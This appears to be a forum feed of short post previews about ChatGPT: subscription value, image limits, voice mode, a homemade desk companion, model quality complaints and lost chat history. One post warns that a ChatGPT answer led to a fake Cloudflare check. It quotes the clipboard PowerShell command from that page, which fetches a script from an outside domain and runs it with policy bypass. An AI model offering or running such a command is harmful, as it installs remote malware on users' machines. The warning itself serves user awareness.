AI cost vs human cost math still doesn't add up for me and I work in healthcare

Physical therapy clinics run on thin margins. I see it every day. So when I hear that AI and robotics are going to be cheaper than humans I actually try to run the numbers in my own context and it falls apart fast. The hardware alone for anything resembling useful physical rehabilitation robotics is six figures minimum. Then you need maintenance contracts, software updates, liability coverage, and someone who actually knows how to run the thing. Meanwhile a skilled PT costs the clinic maybe 40...

I’m a teacher and this year I want to generate lots of images for fun things in my classroom. Is the paid version of CGPT my best option?

I’ve mainly only used ChatGpt for my AI needs. I know their image creating has gotten better over time but now if I buy the $20 subscription don’t I still have limits? What’s the best thing for me to use to pump out 30-50 images in one sitting? Ironically I asked ChatGPT this but I didn’t consider the answer very helpful

Anyone else hate how messy it is to get useful insights out of long AI chats?

My AI usage shifted a lot recently. Originally I used ChatGPT/Claude like a faster search engine—ask a question, get code/answers, move on. But lately, I've been using it more like a sounding board to brainstorm tech architecture, weigh decisions, and talk through complex ideas. It feels way closer to working with a teammate. The annoying part is that chat UIs aren't really built for this. When I brainstorm with a real human, the key decisions actually end up in docs, tickets, or notes. Wi...

Everyone please spread the word!

Everyone please spread the word! Currently you can choose between 3 voice modes. Live, advanced and standard. This post is about standard voice mode NOT live or advanced. The current problem with the standard voice mode is that it is no longer turn based like it used to be. So it can keep getting interrupted and hear its own voice. Please bring back the turn based option to standard voice mode. So ChatGPT can finish what it saying without randomly stopping due to hearing its own voice. Ca...

OpenAI’s AI device may arrive in 2027. I got impatient and built my own “early access” version.

Recent reports suggest that OpenAI and Jony Ive are working on a AI companion that may ship in 2027. I got impatient and built my own interpretation of a physical ChatGPT companion: Chat-PET. Chat-PET is built on a simple idea: AI should be present without being intrusive—offering a glanceable display, better audio and instant physical controls while keeping your desktop free. It doesn’t run ChatGPT or replace the desktop app. Instead, it gives the app a physical home on my desk: A 320×2...

GPT 5.6 Sol is currently really lazy

ChatGPT is really very dumb and lazy right now. Before, when I asked ChatGPT 5.6 Sol at the “Very High” level, it would actually really think and research multiple places. It would spend a solid 2–4 minutes thinking and searching. Now, when I ask it the same questions, it only looks for like 3 pages in the search results, thinks for a maximum of 30–40 seconds, and just answers even though the information isn’t even correct or complete. I mean, it doesn’t even look at the images I send along w...

Is ChatGPT Plus actually worth it for the average person?

For those of you who pay for Plus, what made you finally go “yeah, this is worth paying for”? I’m talking about regular everyday use, not coding, programming, or anything super technical. If GPT-5.6 Luna already handles like 99% of normal stuff for free, what’s the actual selling point of Plus? What do you get out of it that genuinely makes the subscription worth it?

Has anyone else’s ChatGPT suddenly started swearing pretty comfortably? It’s happened a quite a few time today.

It really took me by surprise! I don’t know what happened or what changed maybe an update I’m not aware of? I’ve been recovering my broken shoulder and walking more and more and getting my fitness back and eating better. So I mainly use my “Luna” for updates and progress. Well after a long day and some good progress I updated and told her about my day and how I was sweating and it was a good day and hit my fitness goal. I don’t usually read the responses I play the voice. So I’m listening ...

Malicious Link Response By ChatGPT.

Hello all, Today I had a simple question for Chatgpt. (Ignore my caps lock and misspelling) https://chatgpt.com/share/6a75e933-75f8-83ea-bd7e-bc90a447572f The ChatGPT response directed me to safepage-gpt.com . That site presented a fake Cloudflare verification instructing me to press Win+R, Ctrl+V, and Enter. It also copied this command to my clipboard. powershell -w 1 -ep bypass -c "$a=(irm 'psmoeromanilo.com/ZSlnrgg2gBFD1x3pYa' -UseBasicParsing);[ScriptBlock]::Create($a).Invo...

Open letter to OpenAI: Search is not a substitute for browsing your chat history

Dear OpenAI, I’m a paying ChatGPT Plus subscriber, and I use ChatGPT a lot. Over time, my conversation history has become part of the value of the service to me. I go back to older chats. I browse them. I revisit things I was thinking about weeks or months ago. And now, apparently, I can’t do that anymore. The current interface gives me a limited list of “Recents.” Older chats still exist, and I’m told I can search for them. But there is no longer any way to browse a complete chronological...

Dark Fantasy Battle Scene - GPT-2 and Seedance 2.5

I ran a quick GPT-2 with Seedance 2.5 test using a dark fantasy battle scene, focusing on cinematic action, character consistency, camera movement and visual continuity across the sequence. The goal was simple: see how far I could push AI filmmaking in a scene with fast combat, multiple characters, atmosphere and a consistent visual language from shot to shot. Really interesting results from this experiment. [link] [com...

A Crossover That Was Never Meant to Exist

The prompt I used: Imagine a single coherent reality in which the worlds of [FILM TITLE 1] and [FILM TITLE 2] have always existed together. Their characters, locations, technology, creatures, social rules, dangers and visual identity must coexist naturally in one believable world, rather than looking like two separate franchises pasted into the same frame. Generate a grounded, photorealistic scene depicting a small but consequential everyday incident at the exact point where these two world...
